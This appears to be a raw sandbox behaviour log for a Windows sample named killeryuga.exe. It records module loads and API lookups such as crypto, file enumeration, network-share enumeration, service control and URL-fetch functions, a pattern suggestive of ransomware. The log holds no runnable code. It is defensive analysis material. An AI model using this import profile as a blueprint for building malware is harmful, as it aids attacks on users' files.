Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetScrollBarInfo, address_out = 0x75493ff8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x75493e75 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 05:38:58 (UTC) True 1
Fn
System Get Time type = Ticks, time = 94661 True 1
Fn
System Get Time type = Performance Ctr, time = 14019660373 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75364f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75361252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75364208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7536359f True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75365235 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x753879f9 True 1
Fn
System Get Info type = Hardware Information True 249
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x7536435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x753649d7 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75361856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x7536435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x7536186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x75363519 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7537d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75367a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75361b00 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = RPCRT4.dll, base_address = 0x759b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeA, address_out = 0x759f3fc5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringA, address_out = 0x75a2d918 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringW, address_out = 0x759f1ee5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeW, address_out = 0x759d1635 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidCreate, address_out = 0x759cf48b True 1
Fn
Module Load module_name = MPR.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetEnumResourceW, address_out = 0x750d3058 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetOpenEnumW, address_out = 0x750d2f06 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetCloseEnum, address_out = 0x750d2dd6 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75d30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75d4ab49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x75d59197 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlW, address_out = 0x75dabe5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75d4b406 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoW, address_out = 0x75d55c75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlA, address_out = 0x75d730f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x75d5f18e True 1
Fn
Module Load module_name = WINMM.dll, base_address = 0x75090000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\winmm.dll, function = timeGetTime, address_out = 0x750926e0 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x77020000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x770345bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsA, address_out = 0x7705ad1a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x77033248 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindFileNameW, address_out = 0x7703bb71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7703a1b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendA, address_out = 0x7702d65e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendW, address_out = 0x770381ef True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x7537ce46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x75363c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x75365223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x753653c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75364435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x753617d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75365a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75361b00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x7536103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x7537c807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x75364259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x75361136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x75365371 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x7536186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75361282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeA, address_out = 0x7537ef75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x75361986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x7536588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x75365063 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x7536170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x7536492b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x753610ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x7538830d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FormatMessageW, address_out = 0x75364620 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpynW, address_out = 0x7538d556 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessA, address_out = 0x75361072 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7537d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75363ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x75363f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x75382b7a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x753633a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x75365929 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x7536192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75361700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x7536469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetShortPathNameA, address_out = 0x7538594d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x753659e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x753611c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x753611a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75361222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75361856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x75379af0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x75388baf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x7536168c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x7536183e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x753614b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x7538896c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x7538828e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexA, address_out = 0x75364c6b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x75363da5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75361410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x753689b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x75362d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x75383102 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileA, address_out = 0x75365444 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x75382a9d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetPriorityClass, address_out = 0x7537cf28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75361809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x75363509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeProcess, address_out = 0x7537174d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75364950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x75365558 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x75364467 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x753611f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x753634d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryA, address_out = 0x7538d526 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreW, address_out = 0x7537ca5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x753634b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x7536110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x75363587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x753614fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x753611e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x753649ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x75361916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x753687c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x7538772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x753651cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x753651e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x75361725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x7536465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x753658a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x75361946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x75364d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77603002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesW, address_out = 0x753e425f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x7536495d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatW, address_out = 0x753834d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatW, address_out = 0x7537f481 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x75363bca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x753617b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x75407bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x75361328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x753634c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77611f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x7538d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x753e454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x7536e331 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x753614c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x775fe026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x775f22b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x775f2270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x753651b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x75363531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x75364a6f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x75387aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x7538d1d4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x75368a09 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x753e4691 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x776045f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AreFileApisANSI, address_out = 0x753e40d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75367a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x753614e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x75361450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x753617ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x75365189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x7538d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75364a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75365235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x75364493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x753654ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x7536dd0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x7536179c True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75470000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x75488a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x75491341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x75489a55 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x754878e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostQuitMessage, address_out = 0x75489abb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x754888f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x75491361 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x75487809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x7548b17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x75490dfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = IsWindow, address_out = 0x75487136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x75489679 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x75493559 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x776025dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x754dfd1e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x754905ba True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x75488bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxW, address_out = 0x754dfd3f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x7548787b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x76f50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetHashParam, address_out = 0x76f5df7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CloseServiceHandle, address_out = 0x76f6369c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x76f5df14 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x76f6157a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x76f5df36 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x76f614d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x76f6469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x76f5df66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ControlService, address_out = 0x76f77144 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x76f6468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenServiceW, address_out = 0x76f5ca4c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x76f5e124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x76f5df4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x76f7779b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x76f5c532 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = QueryServiceStatus, address_out = 0x76f62a86 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x76f646ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenSCManagerW, address_out = 0x76f5ca64 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderLocation, address_out = 0x75ebe141 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = CommandLineToArgvW, address_out = 0x75e49ee8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75e51e46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteA, address_out = 0x76077078 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListW, address_out = 0x75ec17bf True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75bd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitialize, address_out = 0x75beb636 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeSecurity, address_out = 0x75bf7259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x75c186d3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75c19d0b True 1
Fn
Module Load module_name = OLEAUT32.dll, base_address = 0x76b50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x76b53eae True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 8, address_out = 0x76b53ed5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 12, address_out = 0x76b55dee True 1
Fn
